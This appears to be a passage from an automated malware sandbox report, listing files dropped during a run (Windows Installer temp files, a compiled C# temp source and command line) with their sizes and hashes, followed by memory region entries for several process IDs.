                          SHA1

                          002a1cee740fa212732379d1f00dbcf7c0cccbf2

                          SHA256

                          24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

                          SHA512

                          725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

                        • C:\Windows\Installer\MSI8779.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • C:\Windows\Installer\MSI898C.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • C:\Windows\Installer\MSI8A48.tmp

                          Filesize

                          537KB

                          MD5

                          d7ec04b009302b83da506b9c63ca775c

                          SHA1

                          6fa9ea09b71531754b4cd05814a91032229834c0

                          SHA256

                          00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

                          SHA512

                          171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

                        • C:\Windows\Installer\MSI8AF5.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • C:\Windows\Installer\MSI8AF5.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • \??\c:\Users\Admin\AppData\Local\Temp\CSC7D2B.tmp

                          Filesize

                          652B

                          MD5

                          278e6586a3b0718ed8eaa2554253c42b

                          SHA1

                          7dccf63389917dcd3ad148ee5effe06e72c5c9c9

                          SHA256

                          c64816be54c8dddbfdb10e9903de226b1026e66e1db70547980744425b3642d0

                          SHA512

                          e517f4d0d24372239443f211840e16255fae90816623722fa8bb733f3d6b47ac09576a17fac19262bbaf862e8c00c30062d23a47e64c11e975a85e50857bb4df

                        • \??\c:\Users\Admin\AppData\Local\Temp\wgi_mj_m.0.cs

                          Filesize

                          354B

                          MD5

                          5cc66596055771b708c426b09785ed18

                          SHA1

                          fe11be68b5f5f01304e2c6b62458ba70ccc9a575

                          SHA256

                          530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08

                          SHA512

                          dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c

                        • \??\c:\Users\Admin\AppData\Local\Temp\wgi_mj_m.cmdline

                          Filesize

                          309B

                          MD5

                          ccf501c85806791ffd42898dfd502d2a

                          SHA1

                          11f79196e62769cb7e9d2af2f26493969e086e27

                          SHA256

                          fa157ae18d94a8a4bc95b8631fcc3488771f1b65082f159e99b8fd14764e6ca2

                          SHA512

                          405b5fb2236003c8d5f2be0ed8ab7bb98bdcc038b7c970eb022a19f885e73fd95fcb7f2f057d0d9ab2f62fd9431e6f4b03fddff982a88f79087c918530a51b3a

                        • \Windows\Installer\MSI8779.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • \Windows\Installer\MSI898C.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • \Windows\Installer\MSI8A48.tmp

                          Filesize

                          537KB

                          MD5

                          d7ec04b009302b83da506b9c63ca775c

                          SHA1

                          6fa9ea09b71531754b4cd05814a91032229834c0

                          SHA256

                          00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

                          SHA512

                          171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

                        • \Windows\Installer\MSI8AF5.tmp

                          Filesize

                          379KB

                          MD5

                          305a50c391a94b42a68958f3f89906fb

                          SHA1

                          4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                          SHA256

                          f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                          SHA512

                          fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                        • memory/2016-33-0x0000000000350000-0x0000000000450000-memory.dmp

                          Filesize

                          1024KB

                        • memory/2016-8-0x0000000000350000-0x0000000000450000-memory.dmp

                          Filesize

                          1024KB

                        • memory/2016-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

                          Filesize

                          64KB

                        • memory/2016-7-0x0000000000350000-0x0000000000450000-memory.dmp

                          Filesize

                          1024KB

                        • memory/2016-6-0x0000000000350000-0x0000000000450000-memory.dmp

                          Filesize

                          1024KB

                        • memory/2016-25-0x000000007149D000-0x00000000714A8000-memory.dmp

                          Filesize

                          44KB

                        • memory/2016-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

                          Filesize

                          4KB

                        • memory/2016-2-0x000000007149D000-0x00000000714A8000-memory.dmp

                          Filesize

                          44KB

                        • memory/2256-102-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2256-103-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2256-104-0x0000000001E80000-0x0000000001EC0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2256-105-0x0000000001E80000-0x0000000001EC0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2256-106-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2256-107-0x0000000001E80000-0x0000000001EC0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2256-108-0x0000000001E80000-0x0000000001EC0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2612-64-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2612-27-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2612-26-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2644-12-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2644-13-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2644-14-0x00000000023D0000-0x0000000002410000-memory.dmp

                          Filesize

                          256KB

                        • memory/2644-15-0x00000000023D0000-0x0000000002410000-memory.dmp

                          Filesize

                          256KB

                        • memory/2644-40-0x00000000023D0000-0x0000000002410000-memory.dmp

                          Filesize

                          256KB

                        • memory/2644-46-0x00000000023D0000-0x0000000002410000-memory.dmp

                          Filesize

                          256KB

                        • memory/2644-34-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2748-48-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2748-126-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2748-47-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2748-101-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2812-87-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2812-37-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2812-36-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2812-39-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2812-35-0x000000006ADC0000-0x000000006B36B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/2812-88-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2812-90-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2812-38-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB

                        • memory/2812-89-0x0000000002580000-0x00000000025C0000-memory.dmp

                          Filesize

                          256KB